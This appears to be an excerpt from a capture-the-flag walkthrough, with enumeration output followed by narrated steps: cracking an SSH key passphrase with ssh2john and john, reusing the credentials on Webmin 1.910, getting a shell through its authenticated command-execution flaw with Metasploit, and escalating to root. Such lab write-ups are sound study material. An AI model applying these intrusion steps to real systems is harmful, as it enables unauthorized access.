-rw-r--r-- 1 root root 2584 Feb 1 2018 /etc/gai.conf
-rw-r--r-- 1 root root 513 Aug 24 11:27 /etc/nsswitch.conf
-rw-r--r-- 1 root root 14867 Oct 13 2016 /etc/ltrace.conf
-rw-r--r-- 1 root root 3028 Aug 24 11:26 /etc/adduser.conf
-rw-r--r-- 1 root root 604 Aug 13 2017 /etc/deluser.conf
-rw-r--r-- 1 root root 34 Jan 27 2016 /etc/ld.so.conf
-rw-r--r-- 1 root root 812 Mar 24 2018 /etc/mke2fs.conf

[-] Current user's history files:


-rw------- 1 redis redis 399 Oct 25 14:43 /var/lib/redis/.bash_history

[-] Location and contents (if accessible) of .bash_history file(s):


/home/Matt/.bash_history

[-] Any interesting mail in /var/mail:


total 8
drwxrwsr-x 2 root mail 4096 Aug 24 11:24 .
drwxr-xr-x 13 root root 4096 Aug 25 18:24 ..

ssh
We got the SSH private key for the user Matt from /opt.

The key is passphrase-protected, so we need the passphrase to log in as that user over SSH.

The key was converted into a crackable hash with ssh2john, and running john-the-ripper against it with the rockyou wordlist gave the passphrase computer2008.

This passphrase does not get us in over SSH. A cracked passphrase only unlocks the key locally; whether sshd accepts the login still depends on the server's authorized_keys and its user restrictions.

But the same username and password work for Webmin.
Webmin
So far we have the password of a user account that is valid for Webmin.

Webmin 1.910 (MiniServ 1.910 on port 10000 in the nmap output) is vulnerable to authenticated remote command execution, so we can get a shell from here.

Use Metasploit to get the shell (set SSL to true, because Webmin serves port 10000 over HTTPS), and we get the shell.

Root turned out to be very simple: just "sudo -i" in the Webmin directory. Worth checking with id first: Webmin's miniserv normally runs as root, so the shell the exploit hands back is usually root already, and sudo -i then just opens a root login shell without prompting for a password.
